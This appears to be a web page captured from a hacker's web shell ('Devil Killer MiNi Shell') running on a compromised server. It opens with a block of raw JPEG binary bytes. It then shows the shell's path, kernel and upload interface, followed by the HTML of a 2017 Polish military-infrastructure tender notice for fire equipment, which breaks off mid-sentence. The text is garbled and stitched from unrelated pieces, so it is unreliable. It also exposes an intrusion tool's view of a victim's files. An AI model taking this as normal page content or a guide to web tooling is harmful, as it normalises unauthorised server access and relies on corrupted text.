JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170612/530133-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 530133-N-2017 z dnia 2017-06-12 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Wojskowy Zarząd Infrastruktury w Poznaniu</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa sprzętu pożarniczego</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Wojskowy Zarząd Infrastruktury w Poznaniu</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">63015300300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Kościuszki</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu"></span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">60967 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Poznań</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">wielkopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">618 573 323, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">kszp@wzipoznan.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">061 8572727, 8572489</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.wzipoznan.wp.mil.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Jednostka Budżetowa MON</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.wzipoznan.wp.mil.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Tak</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny">pocztą, kurierem</span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pocztą, kurierem</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Wojskowy Zarząd Infrastruktury, ul. Kościuszki 92/98, 61-716 Poznań (skrytka pocztowa 129). Budynek nr 3, pokój nr 5 (Kancelaria).</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa sprzętu pożarniczego</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">51/WZI/17/WGSI</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Dostawa sprzętu pożarniczego w 2 częściach:I część - dostawa środka pianotwórczegoII część - Dostawa sprzętu pożarniczego</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">35811100-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>35111520-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">203251,00</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">30</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1.	Do oferty należy załączyć:a) oświadczenie o braku podstaw do wykluczenia z powodu wystąpienia okoliczności, o których mowa w art. 24 ust. 1 pkt 12-23 i art. 24 ust. 5 pkt. 1 ustawy Pzp - załącznik nr 3 do SIWZ;b) aktualny odpis z właściwego rejestru lub centralnej ewidencji informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust 5 pkt. 1 ustawy Pzp, c) oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie ze wzorem załącznika nr 2 do SIWZ; d) oświadczenie o posiadaniu świadectwa dopuszczenia wyrobu do użytkowania w ochronie przeciwpożarowej wydanego przez jednostki badawczo-rozwojowe Państwowej Straży Pożarnej - załącznik nr 5 do SIWZ;2. Informacje zawarte w oświadczeniach będą stanowić wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu i spełnia warunki udziału w postepowaniu.3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie:a)	o którym mowa w Rozdziale V ust. 1 pkt a) i b) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzić brak podstaw do wykluczenia,b)	o którym mowa w Rozdziale V ust. 1 pkt c) i d) składają wspólnie Wykonawcy ubiegający się o udzielenie zamówienia. Oświadczenie to podpisują wszyscy członkowie konsorcjum lub ustanowiony Pełnomocnik. 4. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku podstaw do wykluczenia z udziału w postępowaniu oraz spełnienia - w zakresie, w jakim powołuje się na ich zasoby - warunków udziału w postępowaniu składa także oświadczenia, o których mowa w Rozdziale V ust. 1 pkt a, c, i d. ?	W celu oceny, czy Wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, zamawiający żąda dokumentów, które określają w szczególności:a)	zakres dostępnych wykonawcy zasobów innego podmiotu;b)	sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego;c)	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;d)	czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługę, której wskazane zdolności dotyczą.5. Dokumenty załączone do oferty muszą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Uznaje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem kopii dokumentów załączonych do oferty.6. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniami na język polski, poświadczonymi przez Wykonawcę.7. Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust 5 ustawy Pzp, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp zgodnie z załącznikiem nr 4 do SIWZ.Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.8. Jeżeli Wykonawca nie złoży oświadczenia, o którym mowa w Rozdziale V ust. 1 niniejszej SIWZ, oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25.1 ustawy Pzp, lub innych dokumentów niezbędnych do przeprowadzenia postępowania, oświadczenia lub dokumenty są niekompletne, zawierają błędy lub budzą wskazane przez Zamawiającego wątpliwości, Zamawiający wezwie do ich złożenia, uzupełnienia, poprawienia w terminie przez siebie wskazanym, chyba, że mimo ich złożenia oferta Wykonawcy podlegałaby odrzuceniu albo konieczne byłoby unieważnienie postępowania.9. Zgodnie z art. 26 ust. 2 , Zamawiający zastrzega sobie prawo do wezwania Wykonawcy, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp w tym Kserokopię świadectwa dopuszczenia wyrobu do użytkowania w ochronie przeciwpożarowej wydanego przez jednostki badawczo-rozwojowe Państwowej Straży Pożarnej:w Części I poz.: 1, w Części II w poz.: 7,8,18,20,27,28,32,33,34,35,37 10. Ponadto Wykonawca załączy do oferty: 1)	Kopię dowodu wniesienia wadium,2)	Pełnomocnictwo:?	dla osoby podpisującej ofertę, do podejmowania zobowiązań w imieniu Wykonawcy, 